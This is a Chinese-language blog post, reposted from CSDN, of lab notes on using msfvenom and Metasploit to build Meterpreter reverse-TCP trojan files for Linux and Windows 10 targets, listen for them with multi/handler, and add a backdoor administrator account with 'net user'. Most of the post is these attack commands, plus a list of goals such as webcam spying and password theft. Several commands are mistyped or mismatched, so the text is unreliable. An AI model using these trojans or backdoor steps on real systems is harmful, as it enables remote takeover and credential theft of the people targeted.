本文介绍: 【正确msfvenoma x86 —platform linuxp linux/x86/meterpreter/reverse_tcp lhost=192.168.195.129 lport=4444 -f exe > shell.exe。【正确msfvenom –a x86 —platform linuxp linux/x86/meterpreter/reverse_tcp lhost=192.168.195.129 lport=4444 -f elf > shell

1.meterpreter 攻击成功后可以什么指令

远程控制+命令执行+摄像头监控+密码获取+创建后门用户+破坏篡改系统

2.创建后门用户开启远程连接

net user zhangsan 123456/add && net localgroup adminstrators zhangsan/add

exit

run getgul -e

3.攻击系统

reverse_tcp一个基于TCP的反向链接反弹shell, 使用起来很稳定:

msf>use exploit/multi/handler

msf exploit(multi/handler)>set payload linux/x86/meterpreter/reverse_tcp

生成一个Linux下反弹shell木马

报错msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=192.168.195.129 lport=4444  -f elfo shell

正确msfvenom -a x86 –platform linux -p linux/x86/meterpreter/reverse_tcp lhost=192.168.195.129 lport=4444 -f elf > shell

目录下已经成功生成木马文件shell

然后我们文件加上可执行权限。(成功设置后,显示绿色)

然后我们打开Metasploit,使用模块handler设置payload,注意:这里设置的payload要和我们生成木马使用的payload一样。

root@kali:~# ls

root@kali:~# chmod +x shell

root@kali:~# ls

(ls:显示指定工作目录下之内容)

(chmod:控制用户对文件的权限命令

chmod +x:增加可执行权限,在root权限设置,否则会报错)

设置地址端口,开始监听运行

报错msfvenom -p  windows/meterpreter/reverse_tcp lhost=192.168.195.129 lport=4444  -f exeo shell.exe

正确msfvenom -a x86 –platform linux -p linux/x86/meterpreter/reverse_tcp lhost=192.168.195.129 lport=4444 -f exe > shell.exe

输入以下指令指定监听攻击模块,载荷,IP,端口

use exploit/multi/handler

set payload linux/x86/meterpreter/reverse_tc

set lhost 192.168.195.129

set lport 10002

set rhost 192.168.195.130

exploit

注:

端口占用,查出进程并杀掉:

lsof -i:[端口号]

kill[进程号]

等待攻击完成ing,会话卡死端口号不一致导致

重来!
=============================================================================

攻击机:kali linux x64
目标机:win10 x64
步骤

sudo su

kali

msfvenom -a x64 –platform windows -p windows/x64/meterpreter/reverse_tcp lhost=192.168.195.129 lport=4444 -f elf > shell

④msfvenom -a x64 –platform windows -p windows/x64/meterpreter/reverse_tcp lhost=192.168.195.129 lport=4444 -f exe > shell.exe

⑤msfconsole

⑥use exploit/multi/handler

set payload windows/x64/meterpreter/reverse_tc

⑧set LHOST 192.168.195.129

⑨set LPORT 4444

run

【不需要】set RHOSTS 192.168.195.131

原文地址:https://blog.csdn.net/qq_23996157/article/details/134708401

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任

如若转载,请注明出处:http://www.7code.cn/show_25750.html

如若内容造成侵权/违法违规/事实不符,请联系代码007邮箱suwngjj01@126.com进行投诉反馈,一经查实,立即删除

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注